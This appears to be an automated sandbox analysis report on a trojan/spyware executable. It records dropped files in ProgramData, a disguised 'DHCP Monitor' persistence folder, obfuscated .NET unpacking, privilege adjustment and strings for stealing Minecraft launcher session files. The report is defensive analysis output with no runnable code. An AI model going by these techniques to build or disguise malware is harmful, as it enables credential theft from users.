Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process created: C:\ProgramData\output.exe "C:\ProgramData\output.exe"
Source: C:\ProgramData\output.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process created: C:\ProgramData\nano.exe "C:\ProgramData\nano.exe"	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process created: C:\ProgramData\output.exe "C:\ProgramData\output.exe"	Jump to behavior

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\ProgramData\nano.exe	Code function: 2_2_054D1692 AdjustTokenPrivileges,		2_2_054D1692
Source: C:\ProgramData\nano.exe	Code function: 2_2_054D165B AdjustTokenPrivileges,		2_2_054D165B

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\4Y85lSOUJ0.exe.log

Jump to behavior

Source: C:\ProgramData\output.exe

File created: C:\Users\user\AppData\Local\Temp\login.db

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/9@3/3

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\ProgramData\nano.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\ProgramData\nano.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\ProgramData\nano.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\ProgramData\output.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_01
Source: C:\ProgramData\nano.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\ProgramData\nano.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{e5633be0-23ed-438f-a28c-ab363fff6ac9}

Source: C:\ProgramData\nano.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: 4Y85lSOUJ0.exe	String found in binary or memory: copy to : /\launcher_profiles.json5Minecraft Session Profiles-launcher_profiles.json'multipart/form-data
Source: 4Y85lSOUJ0.exe	String found in binary or memory: #Minecraft SessionKUnable to find launcher_profiles.jsonE\.minecraft\launcher_accounts.json/\launcher_accounts.json-launcher_accounts.jsonKUnable to find launcher_accounts.json

Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: dhcpmon.exe.2.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: dhcpmon.exe.2.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\ProgramData\output.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\output.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\output.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\ProgramData\nano.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: 4Y85lSOUJ0.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 4Y85lSOUJ0.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: indows\mscorlib.pdbpdblib.pdb source: nano.exe, 00000002.00000002.552327927.0000000002DF5000.00000004.00000040.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Source: 4Y85lSOUJ0.exe, Program.cs	.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, Program.cs	.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, Program.cs	.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dhcpmon.exe.2.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2D5C push ecx; retf	2_2_011D2D6E
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2D5C push ecx; retf	2_2_011D2D86
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2D5C push edi; retf	2_2_011D2DFE
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2E59 push edi; retf	2_2_011D2DF2
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2545 pushfd ; iretd	2_2_011D254E
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D3145 push eax; retf	2_2_011D314A
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D3379 pushfd ; iretd	2_2_011D338A
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2875 push edi; retf	2_2_011D2882
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2D80 push ecx; retf	2_2_011D2D86
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2EB8 pushfd ; iretd	2_2_011D2ED6
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D27D8 push eax; retf	2_2_011D27DA
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2FD0 push eax; retf	2_2_011D2FD6
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2FC9 push esp; iretd	2_2_011D2FCA
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D29C8 pushfd ; iretd	2_2_011D29C6
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D29C2 pushfd ; iretd	2_2_011D29C6
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2DEC push ecx; retf	2_2_011D2D86
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D2DEC push edi; retf	2_2_011D2DF2
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D32E8 push esi; iretd	2_2_011D32FA
Source: C:\ProgramData\nano.exe	Code function: 2_2_011D28E1 push edi; retf	2_2_011D28E2
Source: C:\ProgramData\nano.exe	Code function: 2_2_011E9D78 pushad ; retf	2_2_011E9D79
Source: C:\ProgramData\nano.exe	Code function: 2_2_011E9D74 push eax; retf	2_2_011E9D75

Source: initial sample

Static PE information: section name: .text entropy: 7.20683355294

Source: dhcpmon.exe.2.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: dhcpmon.exe.2.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	File created: C:\ProgramData\nano.exe			Jump to dropped file
